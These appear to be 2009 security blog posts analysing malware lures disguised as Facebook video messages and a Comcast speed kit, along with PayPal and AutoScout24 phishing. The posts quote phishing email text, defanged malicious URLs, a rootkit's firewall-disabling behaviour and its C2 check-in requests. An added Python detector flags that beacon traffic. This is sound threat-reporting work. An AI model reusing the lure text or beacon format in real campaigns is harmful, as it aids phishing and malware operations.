Facebook message with link to striptease video leads to malware

A message purporting to come from Facebook Mail, with the subject line “FaceBook message: Magnificent Striptease Dance (Last rated by Lorena Keyes)”, contains a URL that leads to a host serving malware.

Some alternative subjects are:

FaceBook message: Magnificent girl dancing video clip (Last rated by Sal Velasquez)
FaceBook message: Dancing Girl Drunk In The Pub- facebook Video (Last rated by Abe Bain)
FaceBook message: Hot Girl Dancing At Striptease Dance Party (Last rated by Lowell Clay)
FaceBook message: Dancing Girl Drunk In The Pub- facebook Video (Last rated by Shane Lucas)

The body of the email:

Messages from Your Friends on Facebook, March 19, 2009

You have 1 Personal Message:
Video title: “Amanda is dancing on Striptease Dance Party, March 14, 2009! We’re absolutely shocked!”.

Proceed to view full video message:

hxxp://facebook.shared.default.personalid-f58xc9cp8.launchpad.videosshared.com/home.htm?/efsonline/application=3l6mwjxsb1kpema

Message ID: FB-wtq2w9w5ig7z5gf
2009 Facebook community, Message Center.

The URL leads to a Facebook look-alike web site that offers the video.

That page tells you that you first need to download the newest Adobe Flash Player. The file is presented as Flash_Adobe11.exe and is the same malware as in the Comcast High Speed Self Installation Kit post from earlier today.

The malware contains Rootkit.Agent.EX, which hides its presence on the infected machine in order to perform malicious actions without the user’s knowledge. The files %Windir%\9129837.ex, %System%\abcdefg.bat and %Windir%\new_drv.sys (a hidden file) are created on an infected machine.

A new hidden process 9129837.exe is started and the following system services are stopped: ALG (Application Layer Gateway Service), SharedAccess (Windows Firewall/Internet Connection Sharing) and wscsvc (Security Center). Stopping SharedAccess and wscsvc switches off the Windows Firewall and the Security Center warnings, so the user gets no alert that the firewall is down. The malware then connects to the IP 58.65.232.17 on port 80 with one of the following GET requests:

cgi-bin/cmd.cgi?user_id=412227526&version_id=12&passphrase=fkjvhsdvlksdhvlsd
&socks=14477&version=125&crc=00000000

cgi-bin/options.cgi?user_id=412227526&version_id=12&passphrase=fkjvhsdvlksdhvlsd
&socks=14477&version=125&crc=00000000

VirusTotal permalink and MD5: 8bf819ad4704aab758f86684a108c2a1.

PayPal 5 question survey is just another phishing technique

“PayPal will add $50 credit to your account just for taking part in our quick 5 question survey. Only one survey per card is allowed, if you own multiple cards you can run the survey again for each.”

This is the opening paragraph of a phishing site that lures the visitor into filling in a short survey with the promise of $50 credited to their PayPal account.


At the end of the survey you are asked to fill in your personal details, including your credit card number, expiry date and card PIN.

Some phishing sites don’t have any input validation and accept whatever data is submitted. When I tested this web form my credit card number didn’t match the required 16 digits, and afterwards my card number was reported as invalid. I’m not using real data, of course. ;-)

So I went to the source code and found a nice piece of JavaScript that validates the submitted data. Once everything passes, you get a confirmation screen.

As always, be careful when receiving emails with URLs that redirect you to sites that don’t quite fit the picture. In this case the page layout only imitates PayPal’s, which gives it away as a phishing site, and there is no HTTPS connection. More importantly, if PayPal were running a survey you would not have to fill in your credit card details again.

Comcast High Speed Self Installation Kit is malware

When checking some URLs at MX Lab, this one caught our attention because it is a nice trick to distribute malware: attract people who want high speed internet for free. Don’t we all want that? This one, however, isn’t going to offer you high speed internet at all.

The URL points to hxxp://comcast.corporate.history.userguide-csebfhah6.interstitialcontrol.43534online.com/highspeedinternet.html?/permissions/specialoffer=jt4uffle9qdyzzp.

The website starts with a very nice offer:

Attention All Customers: March 19, 2009

Comcast High Speed Self Installation Kit v.4 is a special utility designed to boost the speed of your connection. This tool has advanced features of the 3rd generation high speed internet with multiple connections , download scheduling, and many more. It is free proposition for all Comcast clients (any connection) for 300 days.

The instructions are very simple: download the 36 kB file ComcastHSkit.exe. In most browsers the download starts automatically after a few seconds.

When we submitted the file to VirusTotal, 6 of the 39 engines detected it, as TR/Crypt.FKM.Gen (AntiVir), Trojan.Crypt.FKM.Gen (McAfee GW Edition) and Mal/EncPk-HJ (Sophos).

The malware contains Rootkit.Agent.EX, which hides its presence on the infected machine in order to perform malicious actions without the user’s knowledge. The files %Windir%\9129837.ex, %System%\abcdefg.bat and %Windir%\new_drv.sys (a hidden file) are created on an infected machine.

A new hidden process 9129837.exe is started and the following system services are stopped: ALG (Application Layer Gateway Service), SharedAccess (Windows Firewall/Internet Connection Sharing) and wscsvc (Security Center). Stopping SharedAccess and wscsvc switches off the Windows Firewall and the Security Center warnings, so the user gets no alert that the firewall is down. The malware then connects to the IP 58.65.232.17 on port 80 with one of the following GET requests:

cgi-bin/cmd.cgi?user_id=412227526&version_id=12&passphrase=fkjvhsdvlksdhvlsd
&socks=14477&version=125&crc=00000000

cgi-bin/options.cgi?user_id=412227526&version_id=12&passphrase=fkjvhsdvlksdhvlsd
&socks=14477&version=125&crc=00000000
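The two check-in requests above (the same ones appear in the Facebook striptease post) are easy to pick out of a web proxy log. The following detector is an added example, not code from the original posts. The log line format (unix time, client IP, method, URL, one request per line) and the four sample lines are constructed for this example; the C2 address, paths and parameter names are the ones quoted in the posts. It matches on the address, but also on the fixed set of six query parameters, which keeps working when the server moves (the post notes it was relocated from Ukraine to Hong Kong).

```python
"""Flag the Rootkit.Agent.EX check-in traffic in web proxy logs.

Added example, not code from the original posts. The log line format
(unix time, client IP, method, URL, one request per line) and the four
sample lines below are constructed for this example; the C2 address,
paths and parameter names are the ones quoted in the posts.
"""
from urllib.parse import parse_qs, urlsplit

C2_ADDRESS = "58.65.232.17"
C2_PATHS = {"/cgi-bin/cmd.cgi", "/cgi-bin/options.cgi"}
# The beacon carries the same six parameters in every request; matching
# on the parameter set keeps working if the server moves to a new address.
BEACON_PARAMS = {"user_id", "version_id", "passphrase", "socks", "version", "crc"}


def classify(url):
    """Return the indicators found in this URL, strongest first."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    query = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    if host == C2_ADDRESS:
        reasons.append("known C2 address")
    if BEACON_PARAMS <= set(query):
        reasons.append("beacon parameter set")
        # The observed samples send a zero CRC; worth recording, but the
        # value may change, so it never decides the verdict on its own.
        if query.get("crc") == ["00000000"]:
            reasons.append("crc placeholder 00000000")
    if parts.path in C2_PATHS:
        # /cgi-bin/cmd.cgi on its own is a generic path; only a hint.
        reasons.append("known C2 path")
    return reasons


def is_beacon(reasons):
    """Alert on the address or the full parameter set, not on the path alone."""
    return "known C2 address" in reasons or "beacon parameter set" in reasons


def scan_log(lines):
    """Return (client, url, reasons) for each request that looks like a check-in."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed or truncated line
        _ts, client, _method, url = fields[:4]
        reasons = classify(url)
        if is_beacon(reasons):
            hits.append((client, url, reasons))
    return hits


# Constructed sample log: two real check-ins from one host, a benign
# cgi-bin request, and the same beacon sent to a relocated server
# (203.0.113.7 is a documentation address standing in for a new C2).
SAMPLE_LOG = """\
1237478400.123 10.0.0.12 GET http://58.65.232.17/cgi-bin/cmd.cgi?user_id=412227526&version_id=12&passphrase=fkjvhsdvlksdhvlsd&socks=14477&version=125&crc=00000000
1237478401.456 10.0.0.12 GET http://58.65.232.17/cgi-bin/options.cgi?user_id=412227526&version_id=12&passphrase=fkjvhsdvlksdhvlsd&socks=14477&version=125&crc=00000000
1237478402.789 10.0.0.15 GET http://www.example.com/cgi-bin/cmd.cgi?action=list
1237478403.000 10.0.0.20 GET http://203.0.113.7/cgi-bin/cmd.cgi?user_id=1&version_id=12&passphrase=abc&socks=1080&version=125&crc=00000000
""".splitlines()

if __name__ == "__main__":
    for client, url, reasons in scan_log(SAMPLE_LOG):
        print(f"{client} -> {url}\n    {', '.join(reasons)}")
```

Note that the GET requests are shown wrapped over two lines in the post; in a real log the query string is one line, as in the sample. The benign request to /cgi-bin/cmd.cgi is deliberately not reported: the path alone is too common to alert on.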

According to other blog posts, the IP 58.65.232.17 is involved in other malicious activity as well, and the server has reportedly been relocated from Ukraine to Hong Kong. Here are some articles:

http://www.f-secure.com/weblog/archives/00001625.html
http://garwarner.blogspot.com

VirusTotal permalink and MD5: 8bf819ad4704aab758f86684a108c2a1.

AutoScout24 subject to phishing

Most phishing emails aim to obtain personal and financial information related to your bank, PayPal or eBay account, but phishers sometimes choose other targets. In this case it is AutoScout24.

At MX Lab we intercepted a few phishing emails today from “Autoscout24 <info@autoscout24.ch>” (obviously spoofed), with the subject “Autoscout24-Verkaeufer Informationen Haben Erfordert” (ungrammatical German, roughly “AutoScout24 seller information required”) and the following content in the email body (German in the original):

Attention!

Dear AutoScout24 member,

We recently noticed that one or more attempts were made to log in to your autoscout24 account from a foreign IP address.

If you recently accessed your account while travelling, the unusual login attempts may have been initiated by you. However, if you did not initiate the login, please visit autoscout24 as soon as possible to verify your identity:

hxxp://autoscot24-ch.info/home/index/login.asp/verify.html

Verifying your identity is a security measure that will ensure you are the only person with access to the account.

Thank you for your patience as we work together to protect your account.

For more information, please see the link below:

http://about.autoscout24.com/de-de/au-company/au-company-agb/au-company-agb-as24.aspx

Kind regards,
AutoScout24 Team,
AutoScout24 GmbH
Rosenheimer Str. 143 b
81671 München

The message claims there is a problem with your account because AutoScout24 noticed login attempts from a foreign IP address, and that you have to log in and verify your identity at the linked site to get the account unlocked again. The link goes to autoscot24-ch.info, a typo domain that has nothing to do with AutoScout24. The original German is also visibly machine-translated: “Klotz in” for “log in” and “Verbindungsblasebalg” for “link below” are word-for-word renderings, which is a tell in itself.

We tested whether the browsers’ built-in phishing filters detected the phishing site. Here are the results:

Safari 3 (Mac OS X): yes
Firefox 3 (Mac OS X): no
Firefox 3 (Windows): no
Internet Explorer 7 (Windows): no
